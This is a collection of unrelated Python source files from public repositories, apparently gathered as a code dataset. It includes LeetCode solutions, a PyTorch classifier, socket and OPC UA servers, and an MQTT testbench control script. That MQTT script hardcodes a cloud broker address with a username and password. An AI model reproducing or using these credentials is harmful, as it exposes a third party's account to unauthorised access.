\r\n\r\n","repo_name":"fuffenz/ha-sensor-sl","sub_path":"sl.py","file_name":"sl.py","file_ext":"py","file_size_in_byte":6814,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"52"} +{"seq_id":"71045613286","text":"# Given a string s which consists of lowercase or uppercase letters, return the \n# length of the longest palindrome that can be built with those letters. \n# \n# Letters are case sensitive, for example, \"Aa\" is not considered a palindrome \n# here. 
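Key idea for the solution below: pair letters up, and at most one letter with an odd count can occupy the middle.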
\n # \n # Example 1: \n # \n # \n # Input: s = \"abccccdd\"\n# Output: 7\n# Explanation:\n# One longest palindrome that can be built is \"dccaccd\", whose length is 7.\n# \n# \n# Example 2: \n# \n# \n# Input: s = \"a\"\n# Output: 1\n# \n# \n# Example 3: \n# \n# \n# Input: s = \"bb\"\n# Output: 2\n# \n# \n# \n# Constraints: \n# \n# \n# 1 <= s.length <= 2000 \n# s consists of lowercase and/or uppercase English letters only. \n# \n# Related Topics Hash Table String Greedy 👍 2752 👎 161\nimport collections\nfrom typing import List, Optional\nfrom dataStructure.ListNode import ListNode\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def longestPalindrome(self, s: str) -> int:\n count = collections.Counter(s)\n ans = 0\n for alp, num in count.items():\n if num % 2 == 0:\n ans += num\n else:\n ans += num - 1\n if len(s) == ans:\n return ans\n else:\n return ans + 1\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n a = Solution()\n print(a.longestPalindrome(s=\"abccccdd\"))\n","repo_name":"ChaunceyBai98/LeetCodePython","sub_path":"leetcode/editor/en/[409]Longest Palindrome.py","file_name":"[409]Longest Palindrome.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40344796228","text":"import sys, argparse, requests, json\r\n\r\ndef main(argv):\r\n keyword = ''\r\n limit = ''\r\n \r\n # Setting command line input parameters.\r\n parser = argparse.ArgumentParser(description=\"Get repositories info based on keyword and limit (number of repositories returned)\")\r\n parser.add_argument('keyword', help='The string keyword to search repositories for, e.g: \"search abc\"')\r\n parser.add_argument('limit', type=int, help='Number of repositories returned ( 1 <= limit <= 100)')\r\n args = parser.parse_args()\r\n \r\n keyword = args.keyword\r\n limit = args.limit\r\n\r\n # Execute GET request with specified keyword and limit\r\n get(keyword, limit)\r\n\r\n# Helper to submit the GET request.\r\ndef get(keyword, limit):\r\n \r\n # Build the request URI.\r\n uri = \"https://api.github.com/search/repositories?q={0}&sort=forks&order=desc&per_page={1}\".format(keyword, limit)\r\n\r\n # Set the json result.\r\n jsonResult = {}\r\n \r\n # Submit request if limit is valid.\r\n if (limit <= 0 or limit > 100):\r\n jsonResult['error'] = 'Limit must be between 1 and 100!'\r\n else:\r\n getResult = requests.get(uri).json()\r\n \r\n # Build the json result\r\n jsonResult['keyword'] = keyword\r\n jsonResult['desired_repositories_number'] = limit\r\n \r\n # Get all the repository items.\r\n items = getResult[\"items\"]\r\n \r\n jsonResult['returned_repositories_number'] = len(items)\r\n repos = []\r\n # Build details for each item.\r\n for item in items:\r\n details = {}\r\n details[\"id\"] = item[\"id\"]\r\n details[\"name\"] = item[\"name\"]\r\n details[\"description\"] = item[\"description\"]\r\n details[\"language\"] = item[\"language\"]\r\n details[\"created_date\"] = item[\"created_at\"]\r\n details[\"html_url\"] = item[\"html_url\"]\r\n details[\"watchers\"] = item[\"watchers_count\"]\r\n details[\"forks\"] = item[\"forks_count\"]\r\n details[\"owner_username\"] = item[\"owner\"][\"login\"]\r\n details[\"owner_id\"] = item[\"owner\"][\"id\"]\r\n details[\"owner_html_url\"] = item[\"owner\"][\"html_url\"]\r\n repos.append(details)\r\n \r\n jsonResult[\"repositories\"] = repos\r\n \r\n print (json.dumps(jsonResult, indent 
= 3))\r\n\r\nif __name__ == \"__main__\":\r\n main(sys.argv[1:])","repo_name":"steventhai/test","sub_path":"repos.py","file_name":"repos.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42275344670","text":"import numpy\nimport pytorch_lightning as pl\nimport torch\nimport torch.nn as nn\n\n\nclass LinearClassifier(pl.LightningModule):\n def __init__(self, hparams, train_dataset, val_dataset, test_dataset):\n super().__init__()\n\n def initialize_weights(m):\n if type(m) == nn.Linear:\n torch.nn.init.xavier_normal_(m.weight)\n elif type(m) == nn.Conv2d:\n torch.nn.init.xavier_normal_(m.weight)\n\n self.save_hyperparameters(hparams)\n\n self.train_dataset = train_dataset\n self.val_dataset = val_dataset\n self.test_dataset = test_dataset\n\n in_features = hparams.get('input_features', 1000)\n out_features = hparams.get('output_features', 10)\n act_fn = self.get_activation_function(hparams['activation_function'])\n\n layers = []\n layers.extend([\n nn.Linear(in_features, 1000),\n act_fn,\n nn.Linear(1000, 1000),\n act_fn,\n nn.Linear(1000, 100),\n act_fn,\n nn.Linear(100, out_features)  # raw logits: cross_entropy in general_step applies log-softmax itself\n ])\n\n for layer in layers:\n layer.apply(initialize_weights)\n self.model = nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.model(x)\n return x\n\n @staticmethod\n def get_activation_function(func_str):\n switch = {\n 'ReLU': nn.ReLU(),\n 'LeakyReLU': nn.LeakyReLU(),\n 'Sigmoid': nn.Sigmoid(),\n 'Tanh': nn.Tanh(),\n }\n return switch.get(func_str, nn.LeakyReLU())\n\n def general_step(self, batch):\n images, targets = batch\n flattened_images = images.view(images.shape[0], -1)\n out = self.forward(flattened_images)\n loss = nn.functional.cross_entropy(out, targets)\n\n return loss\n\n def training_step(self, batch, batch_idx):\n loss = self.general_step(batch)\n self.log(\"train_loss\", loss)\n return loss\n\n def validation_step(self, batch, batch_idx):\n loss = self.general_step(batch)\n self.log(\"val_loss\", loss)\n return loss\n\n def test_step(self, batch, batch_idx):\n loss = self.general_step(batch)\n self.log(\"test_loss\", loss)\n return loss\n\n # implement _end functions\n\n def train_dataloader(self):\n return torch.utils.data.DataLoader(self.train_dataset, shuffle=True, batch_size=self.hparams['batch_size'], num_workers=4)\n\n def val_dataloader(self):\n return torch.utils.data.DataLoader(self.val_dataset, shuffle=True, batch_size=self.hparams['batch_size'], num_workers=4)\n\n def test_dataloader(self):\n return torch.utils.data.DataLoader(self.test_dataset, shuffle=True, batch_size=self.hparams['batch_size'], num_workers=4)\n\n def configure_optimizers(self):\n optim = torch.optim.Adam(self.model.parameters(), lr=self.hparams['lr'])\n return optim","repo_name":"AjayDextrous/AI-Experiments","sub_path":"models/linear_classifier.py","file_name":"linear_classifier.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40598140342","text":"# auto_data_acq.py\nimport sys, os\nfrom testbench_PLC import surf_temp_calib\nimport paho.mqtt.client as mqtt\nimport time\nfrom datetime import datetime\n\n\nbroker_address = \"72bcebd3aeb4444586a7c1152291630d.s1.eu.hivemq.cloud\"\nbroker_port = 8883\n\nclient = mqtt.Client(client_id=\"MBP_mxu\", clean_session=True)\nclient.will_set(\"Rkl/testbench/launcher/status\", payload=\"Status: OFF\", retain=True)\n\n\ndef 
on_connect(client, userdata, flags, rc):\n if rc == 0:\n print(\"connected to MQTT server\")\n else:\n print(f\"connect failed with code {rc}\")\n\n\ndef run():\n other_temp = 35\n targ_temp = 35\n client.on_connect = on_connect\n # enable TLS for secure connection\n client.tls_set(tls_version=mqtt.ssl.PROTOCOL_TLS)\n # set username and password\n while True:\n try:\n client.username_pw_set(\"MBP_minsheng\", \"Hive001601027\")\n client.connect(broker_address, broker_port, 7200) # keep_alive must be greater than hold+write time?\n '''\n auto. publish plan:\n In every 50min:\n 1. adjust the supply temperature set of 1150, from 15°C to 45°C in step of 5 K\n 2. run the script surf_temp_calib.py (last about 10 min)\n After a cycle (15 - 45°C):\n 2. increase the supply temperature set of 10L1-3, 10X123, 1110-1140, 1160, 121A-125A by 15 K\n '''\n supply_temp_set_10L1 = other_temp\n supply_temp_set_10S123 = other_temp\n supply_temp_set_10L2 = other_temp\n supply_temp_set_10L3 = other_temp\n supply_temp_set_1110 = other_temp\n supply_temp_set_1120 = other_temp\n supply_temp_set_1130 = other_temp\n supply_temp_set_1140 = other_temp\n supply_temp_set_1150 = targ_temp\n supply_temp_set_1160 = other_temp\n supply_temp_set_121A = other_temp\n supply_temp_set_122A = other_temp\n supply_temp_set_123A = other_temp\n supply_temp_set_124A = other_temp\n supply_temp_set_125A = other_temp\n print(supply_temp_set_1150)\n client.publish(\"Rkl/WtrSup/zone11/panel_0/fSupTempSet\", supply_temp_set_10L1, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_1/fSupTempSet\", supply_temp_set_10S123, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_2/fSupTempSet\", supply_temp_set_10L2, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_3/fSupTempSet\", supply_temp_set_10L3, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_4/fSupTempSet\", supply_temp_set_1110, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_5/fSupTempSet\", supply_temp_set_1120, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_6/fSupTempSet\", supply_temp_set_1130, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_7/fSupTempSet\", supply_temp_set_1140, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_8/fSupTempSet\", supply_temp_set_1150, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_9/fSupTempSet\", supply_temp_set_1160, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_10/fSupTempSet\", supply_temp_set_121A, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_11/fSupTempSet\", supply_temp_set_122A, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_12/fSupTempSet\", supply_temp_set_123A, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_13/fSupTempSet\", supply_temp_set_124A, qos=0, retain=False)\n client.publish(\"Rkl/WtrSup/zone11/panel_14/fSupTempSet\", supply_temp_set_125A, qos=0, retain=False)\n time.sleep(20 * 60)\n print(\"start writing data into .csv file\")\n print(datetime.now())\n\n now = str(datetime.now().strftime(\"%m%d_%H%M\"))\n print(now)\n file_name = \"../Data/\" + now + \"_surf_temp_1150_rec.csv\"\n stop_time = 10 * 60\n write_csv = surf_temp_calib.Write_to_csv(file_name, stop_time)\n write_csv.start_script()\n\n print(\"finish writing data into .csv file\")\n targ_temp += 5\n print(targ_temp, supply_temp_set_1150)\n if supply_temp_set_1150 == 45:\n targ_temp = 15\n other_temp += 5\n if other_temp > 45:\n other_temp = 15\n print(\"achieve the limit 
of supply temperature, start recording from the min. supply temperature\")\n time.sleep(1 * 60)\n print(\"restart recording data\")\n except Exception as e:\n print(repr(e))\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"Schwarz-XU/MA_IR-Kamera","sub_path":"raspi-mlx90640/DataProcessing/auto_data_acq.py","file_name":"auto_data_acq.py","file_ext":"py","file_size_in_byte":4832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22337457409","text":"n=int(input())\r\ndp=list(range(n+1))\r\nfor i in range(n+1):\r\n six=6\r\n while 0<=(i-six):\r\n dp[i]=min(dp[i],dp[i-six]+1)\r\n six*=6\r\n nine=9\r\n while 0<=(i-nine):\r\n dp[i]=min(dp[i],dp[i-nine]+1)\r\n nine*=9\r\nprint(dp[-1])","repo_name":"5418009ohkawatakahiro/Atcoder","sub_path":"ABC/099/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16578955490","text":"\"\"\"\nNaming algorithm\n\nA best match protein and available proteins are provided in the function.\nIt predicts the next available name.\n\nXpp35Ab1\n ---> 35 ---> rank1_naming [1 to 3 digits]\n ---> A ---> rank2_naming [One uppercase letter]\n ---> b ---> rank3_naming [One lowercase letter]\n ---> 1 ---> rank4_naming [ 1 to 3 digits]\n\"\"\"\n\nimport re\nfrom typing import Iterable\n\n\ndef next_alphabetic_character(character):\n \"\"\"\n Given a letter (any upper or lowercase) returns the next letter in the alphabet\n\n >>> next_alphabetic_character('A')\n 'B'\n >>> next_alphabetic_character('a')\n 'b'\n \"\"\"\n\n return chr(ord(character) + 1)\n\n\n\ndef rank2_naming(proteins_available: Iterable[str], best_match_protein_name: str) -> str:\n \"\"\"\n Given a list of proteins available as well as the best match name\n the function returns the predicted name\n\n In this example the function extracts the first three letter pattern along with the number (it can be 1 to 3 digits)\n from the best match protein name. It filters the pattern from the proteins available.\n It also extracts the uppercase letter from the filtered patterns and finds the highest alphabet. 
Predict the next alphabet.\n Add the pattern 'Xpp35', predicted uppercase as well as 'a1' to get the name.\n\n Xpp35Ab1\n ---> pattern ---> Xpp35\n ---> Filters the pattern from the proteins available ---> ['Xpp35Aa1', 'Xpp35Ab45','Xpp35Ad1','Xpp35Ba1']\n ---> Extract all the uppercase from the filtered pattern ---> ['A', 'A', 'A', 'B']\n ---> Find the highest alphabet ---> ['B']\n ---> Predict the next alphabet ---> by using the function next_alphabetic_character() ---> ['C']\n ---> predicted name is Xpp35+C+a1 ---> Xpp35Ca1\n\n >>> proteins_available = ('Xpp1Aa1', 'Xpp2Aa1', 'Xpp35Aa1', 'Xpp35Ab45',\n 'Xpp35Ad1','Xpp35Ba1', 'Xpp36Aa1', 'Xpp49Aa1', 'Xpp49Ab1')\n\n >>> best_match_protein_name = 'Xpp35Ab1'\n\n >>> rank2_naming(proteins_available, best_match_protein_name)\n 'Xpp35Ca1'\n\n \"\"\"\n # extract the three-letter pattern with number Xpp35\n protein_pattern = re.search(r\"[A-Z][a-z]{2}\\d{1,3}\", best_match_protein_name).group()\n\n #re.compile('Xpp35([A-Z])')\n base_pattern = re.compile('{}([A-Z])'.format(protein_pattern))\n\n #Available candidates ['A', 'A', 'A', 'B']\n candidates = []\n for name in proteins_available:\n candidate = base_pattern.search(name)\n if candidate:\n candidates.append(candidate.group(1))\n\n #best candidate in this example 'B'\n best_candidate = max(candidates)\n\n #next letter in this example 'C'\n new_letter = next_alphabetic_character(best_candidate)\n\n #Add the protein pattern, the next predicted letter and 'a1' at the suffix\n #predicted name Xpp35Ca1\n return f'{protein_pattern}{new_letter}a1'\n\ndef rank3_naming(proteins_available: Iterable[str], best_match_protein_name: str) -> str:\n \"\"\"\n Given a list of proteins available as well as the best match name\n the function returns the predicted name\n\n In this example the function extracts the first three letter pattern with the number (it can be 1 to 3 digits)\n and uppercase (1 letter) from the best match protein name. It filters the pattern from the proteins available.\n It also extracts the lowercase letter from the filtered patterns. 
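A short doctest of the same step for lowercase letters, reusing the helper above:\n\n >>> next_alphabetic_character(max(['a', 'b', 'd']))\n 'e'\n\n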
Predict the next alphabet.\n Add the pattern 'Xpp35A', predicted lowercase as well as '1' digit to get the name.\n\n Xpp35Ab1\n ---> pattern ---> Xpp35A\n ---> Filters the pattern from the proteins available ---> ['Xpp35Aa1', 'Xpp35Ab45','Xpp35Ad1']\n ---> Extract all the lowercase from the filtered pattern ---> ['a', 'b', 'd']\n ---> Find the highest alphabet ---> ['d']\n ---> Predict the next alphabet ---> by using the function next_alphabetic_character() ---> ['e']\n ---> predicted name is Xpp35A+e+1 ---> Xpp35Ae1\n\n >>> proteins_available = ('Xpp1Aa1', 'Xpp2Aa1', 'Xpp35Aa1', 'Xpp35Ab45',\n 'Xpp35Ad1','Xpp35Ba1', 'Xpp36Aa1', 'Xpp49Aa1', 'Xpp49Ab1')\n\n >>> best_match_protein_name = 'Xpp35Ab1'\n\n >>> rank3_naming(proteins_available, best_match_protein_name)\n 'Xpp35Ae1'\n\n \"\"\"\n # extract the three-letter pattern Xpp35A from best_match_protein_name Xpp35Ab1\n protein_pattern = re.search(r\"[A-Z][a-z]{2}\\d{1,3}[A-Z]\", best_match_protein_name).group()\n\n # re.compile('Xpp35A([a-z])')\n base_pattern = re.compile('{}([a-z])'.format(protein_pattern))\n\n # ['a', 'b', 'd']\n candidates = []\n for name in proteins_available:\n candidate = base_pattern.search(name)\n if candidate:\n candidates.append(candidate.group(1))\n\n # 'd'\n best_candidate = max(candidates)\n\n # 'e'\n new_letter = next_alphabetic_character(best_candidate)\n\n #Add the protein pattern, the next predicted letter and the digit '1' at the suffix\n #Xpp35Ae1\n return f'{protein_pattern}{new_letter}1'\n\ndef rank4_naming(proteins_available: Iterable[str], best_match_protein_name: str) -> str:\n \"\"\"\n Given a list of proteins available as well as the best match name\n the function returns the predicted name\n\n In this example the function extracts the first three letter pattern with the number (it can be 1 to 3 digits),\n uppercase (1 letter) and a lowercase letter from the best match protein name. It filters the pattern from the proteins available.\n It also extracts the last digits (1 to 3) from the filtered patterns. 
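For example (an illustrative input, not taken from the doctest data below; note the digits must be compared numerically):\n\n >>> max(int(c) for c in ['9', '45']) + 1\n 46\n\n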
Predict the next available number.\n Add the pattern 'Xpp35Ab' and the incremented number to get the name.\n\n Xpp35Ab1\n ---> pattern ---> Xpp35Ab\n ---> Extract the last digits 45\n ---> Filters the pattern from the proteins available ---> ['Xpp35Ab45']\n ---> Add 45 + 1 = 46\n ---> predicted name is Xpp35Ab+46 ---> Xpp35Ab46\n\n\n >>> proteins_available = ('Xpp1Aa1', 'Xpp2Aa1', 'Xpp35Aa1', 'Xpp35Ab45',\n 'Xpp35Ad1','Xpp35Ba1', 'Xpp36Aa1', 'Xpp49Aa1', 'Xpp49Ab1')\n\n >>> best_match_protein_name = 'Xpp35Ab1'\n\n >>> rank4_naming(proteins_available, best_match_protein_name)\n 'Xpp35Ab46'\n\n \"\"\"\n # extract the pattern Xpp35Ab from the best_match_protein_name Xpp35Ab1\n protein_pattern = re.search(r\"[A-Z][a-z]{2}\\d{1,3}[A-Z][a-z]\", best_match_protein_name).group()\n\n # re.compile('Xpp35Ab(\\\\d{1,3})')\n base_pattern = re.compile(r'{}(\\d{{1,3}})'.format(protein_pattern))\n\n # ['45']\n candidates = []\n for name in proteins_available:\n candidate = base_pattern.search(name)\n if candidate:\n candidates.append(candidate.group(1))\n # 45 (compare numerically; a plain string max would rank '9' above '45')\n best_candidate = max(int(c) for c in candidates)\n\n # Add the protein pattern and the incremented digit at the suffix\n # Xpp35Ab46\n return f'{protein_pattern}{best_candidate+1}'\n\n# def main():\n#\n# proteins_available = ('Xpp1Aa1', 'Xpp2Aa1', 'Xpp35Aa1', 'Xpp35Ab45', 'Xpp35Ad1',\n# 'Xpp35Ba1', 'Xpp36Aa1', 'Xpp49Aa1', 'Xpp49Ab1')\n# best_match_protein_name = 'Xpp35Ab1'\n# predicted_name = rank4_naming(proteins_available, best_match_protein_name)\n\n# if __name__ == '__main__':\n#\n","repo_name":"Amrithasuresh/BPPRC_v1","sub_path":"naming_package/naming.py","file_name":"naming.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"70315716646","text":"from typing import List\n\n\n# Method 1\nclass Solution1:\n def findMinArrowShots(self, points: List[List[int]]) -> int:\n points.sort(key=lambda x: x[0])\n num_arrows = 1\n for i in range(len(points) - 1):\n if points[i][1] < points[i+1][0]:\n num_arrows += 1\n else:\n points[i+1][1] = min(points[i][1], points[i+1][1])\n return num_arrows\n\n\n\n\nif __name__ == '__main__':\n points1 = [[10, 16], [2, 8], [1, 6], [7, 12]]\n points2 = [[1, 2], [3, 4], [5, 6], [7, 8]]\n points3 = [[1, 2], [2, 3], [3, 4], [4, 5]]\n points4 = [[1, 2]]\n points5 = [[2, 3], [2, 3]]\n s = Solution1()\n print(s.findMinArrowShots(points1))\n print(s.findMinArrowShots(points2))\n print(s.findMinArrowShots(points3))\n print(s.findMinArrowShots(points4))\n print(s.findMinArrowShots(points5))","repo_name":"cxiaolong/Algorithm-Practice","sub_path":"PythonEdition/贪心算法/452_findMinArrowShots.py","file_name":"452_findMinArrowShots.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70564648804","text":"# stdlib\nimport os\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Union\n\n# third party\nimport ascii_magic\nfrom nacl.signing import SigningKey\nfrom nacl.signing import VerifyKey\n\n# relative\nfrom ....lib.python import String\nfrom ....logger import error\nfrom ...common.message import SignedMessage\nfrom ...common.message import SyftMessage\nfrom ...common.uid import UID\nfrom ...io.location import Location\nfrom ...io.location import SpecificLocation\nfrom ..common.node import Node\nfrom ..common.node_manager.association_request_manager import 
AssociationRequestManager\nfrom ..common.node_manager.group_manager import GroupManager\nfrom ..common.node_manager.role_manager import RoleManager\nfrom ..common.node_manager.user_manager import UserManager\nfrom ..common.node_service.association_request.association_request_service import (\n AssociationRequestService,\n)\nfrom ..common.node_service.node_setup.node_setup_service import NodeSetupService\nfrom ..common.node_service.request_receiver.request_receiver_messages import (\n RequestMessage,\n)\nfrom ..common.node_service.role_manager.role_manager_service import RoleManagerService\nfrom ..common.node_service.user_manager.user_manager_service import UserManagerService\nfrom ..domain.client import DomainClient\nfrom ..domain.domain import Domain\nfrom .client import NetworkClient\n\n\nclass Network(Node):\n\n network: SpecificLocation\n\n child_type = Domain\n client_type = NetworkClient\n child_type_client_type = DomainClient\n\n def __init__(\n self,\n name: Optional[str],\n network: SpecificLocation = SpecificLocation(),\n domain: Optional[Location] = None,\n device: Optional[Location] = None,\n vm: Optional[Location] = None,\n signing_key: Optional[SigningKey] = None,\n verify_key: Optional[VerifyKey] = None,\n root_key: Optional[VerifyKey] = None,\n db_engine: Any = None,\n db: Any = None,\n ):\n super().__init__(\n name=name,\n network=network,\n domain=domain,\n device=device,\n vm=vm,\n signing_key=signing_key,\n verify_key=verify_key,\n db_engine=db_engine,\n db=db,\n )\n\n # specific location with name\n self.network = SpecificLocation(name=self.name)\n self.root_key = root_key\n\n # Database Management Instances\n self.users = UserManager(db_engine)\n self.roles = RoleManager(db_engine)\n self.groups = GroupManager(db_engine)\n self.association_requests = AssociationRequestManager(db_engine)\n\n # Grid Network Services\n self.immediate_services_with_reply.append(AssociationRequestService)\n self.immediate_services_with_reply.append(NodeSetupService)\n self.immediate_services_with_reply.append(RoleManagerService)\n self.immediate_services_with_reply.append(UserManagerService)\n\n self.requests: List[RequestMessage] = list()\n # available_device_types = set()\n # TODO: add available compute types\n\n # default_device = None\n # TODO: add default compute type\n\n self._register_services()\n self.request_handlers: List[Dict[Union[str, String], Any]] = []\n self.handled_requests: Dict[Any, float] = {}\n\n self.post_init()\n\n def post_init(self) -> None:\n super().post_init()\n self.set_node_uid()\n\n def loud_print(self) -> None:\n install_path = os.path.abspath(\n os.path.join(os.path.realpath(__file__), \"../../../../img/\")\n )\n ascii_magic.to_terminal(\n ascii_magic.from_image_file(\n img_path=install_path + \"/pygrid.png\", columns=83\n )\n )\n\n print(\n r\"\"\"\n |\\ | _ |_ _ _ |\n | \\| (- |_ \\)/ (_) | |(\n\"\"\"\n )\n\n @property\n def icon(self) -> str:\n return \"🔗\"\n\n @property\n def id(self) -> UID:\n return self.network.id\n\n def message_is_for_me(self, msg: Union[SyftMessage, SignedMessage]) -> bool:\n # this needs to be defensive by checking network_id NOT network.id or it breaks\n try:\n return msg.address.network_id == self.id and msg.address.domain is None\n except Exception as e:\n error(f\"Error checking if {msg.pprint} is for me on {self.pprint}. 
{e}\")\n return False\n","repo_name":"datax-io/pysyft-parcel","sub_path":"packages/syft/src/syft/core/node/network/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"39456388576","text":"import socket\n\nss = socket.socket()\nprint('Socket Created')\n\nss.bind(('localhost', 9999))\n\nss.listen(3)\nprint('Waiting for connections')\n\nwhile True:\n cs, addr = ss.accept()\n name = cs.recv(1024).decode()\n print(\"Connected with\", addr, name)\n\n cs.send(bytes(\"Welcome to Liopun\", 'utf-8'))\n\n cs.close()","repo_name":"Liopun/py3","sub_path":"projects/sockets/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32220388285","text":"import time\r\nimport random\r\nimport logging\r\nfrom opcua import Server\r\nfrom threading import Thread\r\n\r\n\r\nclass VarUpdater(Thread):\r\n def __init__(self, temp, timeWork):\r\n Thread.__init__(self)\r\n self.stopMark = False\r\n self.temp = temp\r\n self.timeWork = timeWork\r\n\r\n # Функция меняет значения марекра остановки\r\n def stop(self):\r\n self.stopMark = True\r\n\r\n # Функция устанавливает значения для температуры и времени работы\r\n def run(self):\r\n startTime = time.time()\r\n while not self.stopMark:\r\n self.temp.set_value(random.randint(56, 60))\r\n self.timeWork.set_value(\"{0:.0f}:{1:02.0f}:{2:02.0f}\".format(\r\n (time.time() - startTime)//3600,\r\n (time.time() - startTime)//60 % 60,\r\n (time.time() - startTime) % 60))\r\n time.sleep(0.1)\r\n\r\n\r\ntry:\r\n from IPython import embed\r\nexcept ImportError:\r\n import code\r\n # запускает интерактивную консоль\r\n def embed():\r\n myvars = globals()\r\n myvars.update(locals())\r\n shell = code.InteractiveConsole(myvars)\r\n shell.interact()\r\n\r\n# Останавливает работу сервера и работу потоков, в которых устанавливается значение температуры и времени\r\ndef stop_server():\r\n sensor_1Updater.stop()\r\n sensor_2Updater.stop()\r\n sensor_3Updater.stop()\r\n server.stop()\r\n print(\"The server has stopped\")\r\n\r\n# Запускает работу сервера и работу потоков, в которых устанавливается значение температуры и времени\r\ndef start_server():\r\n server.start()\r\n sensor_1Updater.start()\r\n sensor_2Updater.start()\r\n sensor_3Updater.start()\r\n print(\"The server is up\")\r\n\r\n\r\nlogging.basicConfig(\r\n format=u'[LINE:%(lineno)d]# %(levelname)-8s [%(asctime)s] %(message)s',\r\n level=logging.ERROR)\r\nserver = Server()\r\nserver.set_endpoint(\"opc.tcp://localhost:4840\")\r\n\r\nuri = \"MyServerOPC\"\r\nidx = server.register_namespace(uri)\r\nnode = server.get_objects_node()\r\n\r\nsensor_1 = node.add_object(idx, \"Sensor_1\")\r\ntemp_s1 = sensor_1.add_variable(idx, \"Tempreture\", 0)\r\nvelocity_s1 = sensor_1.add_variable(idx, \"Velocity\", 0)\r\nvelocity_s1.set_writable()\r\nforce_s1 = sensor_1.add_variable(idx, \"Force\", 0)\r\nforce_s1.set_writable()\r\ntime_s1 = sensor_1.add_variable(idx, \"Time\", 0)\r\n\r\nsensor_2 = node.add_object(idx, \"Sensor_2\")\r\ntemp_s2 = sensor_2.add_variable(idx, \"Tempreture\", 0)\r\nvelocity_s2 = sensor_2.add_variable(idx, \"Velocity\", 0)\r\nvelocity_s2.set_writable()\r\nforce_s2 = sensor_2.add_variable(idx, \"Force\", 0)\r\nforce_s2.set_writable()\r\ntime_s2 = sensor_2.add_variable(idx, \"Time\", 0)\r\n\r\nsensor_3 = node.add_object(idx, \"Sensor_3\")\r\ntemp_s3 = 
sensor_3.add_variable(idx, \"Tempreture\", 0)\r\nvelocity_s3 = sensor_3.add_variable(idx, \"Velocity\", 0)\r\nvelocity_s3.set_writable()\r\nforce_s3 = sensor_3.add_variable(idx, \"Force\", 0)\r\nforce_s3.set_writable()\r\ntime_s3 = sensor_3.add_variable(idx, \"Time\", 0)\r\n\r\nsensor_1Updater = VarUpdater(temp_s1, time_s1)\r\nsensor_2Updater = VarUpdater(temp_s2, time_s2)\r\nsensor_3Updater = VarUpdater(temp_s3, time_s3)\r\ntry:\r\n start_server()\r\n embed()\r\nfinally:\r\n stop_server()\r\n","repo_name":"egr344/OPC","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41878655748","text":"#python3\n#辞書データを定義\nbot_dict = {\n 'こんにちは': 'コンニチハ',\n 'ありがとう': 'ドウイタシマシテ',\n 'さようなら': 'サヨウナラ',\n }\n\nwhile True:\n command = input('pybot> ')\n #空文字列で初期化する\n response = ''\n #キーを順番に取り出す\n for message in bot_dict:\n if message in command:\n #対応となる文字列を設定する\n response = bot_dict[message]\n break\n\n #空文字列の場合\n if not response:\n response = 'ナニヲイッテルカワカラナイヨ!!'\n #対応メッセージを表示\n print(response)\n\n #whileループを終了\n if 'さようなら' in command:\n break\n","repo_name":"tokuharu/meganeman","sub_path":"pybot_act2.py","file_name":"pybot_act2.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31288534631","text":"\n#Implement a singly linked list, to be used in other applications\n\nclass Node():\n\t#Implement a basic Node object, that has fields next (the node it points to)\n\t#and a value field\n\n\tdef __init__(self, value=None):\n\t\tself.data = value\n\t\tself.next = None\n\nclass linkedList():\n\t#make a singly linked list\n\n\tdef __init__(self):\n\t\t#Instantiate the linked list\n\t\tself.head = None\n\t\tself.tail = None\n\n\tdef add_to_tail(self, val):\n\t\t#add a node to the list\n\t\tnew_node = Node(val)\n\t\tif self.head == None:\n\t\t\tself.head = new_node\n\t\t\tself.tail = new_node\n\t\telse:\n\t\t\ttracker = self.head\n\t\t\twhile tracker.next != None:\n\t\t\t\ttracker = 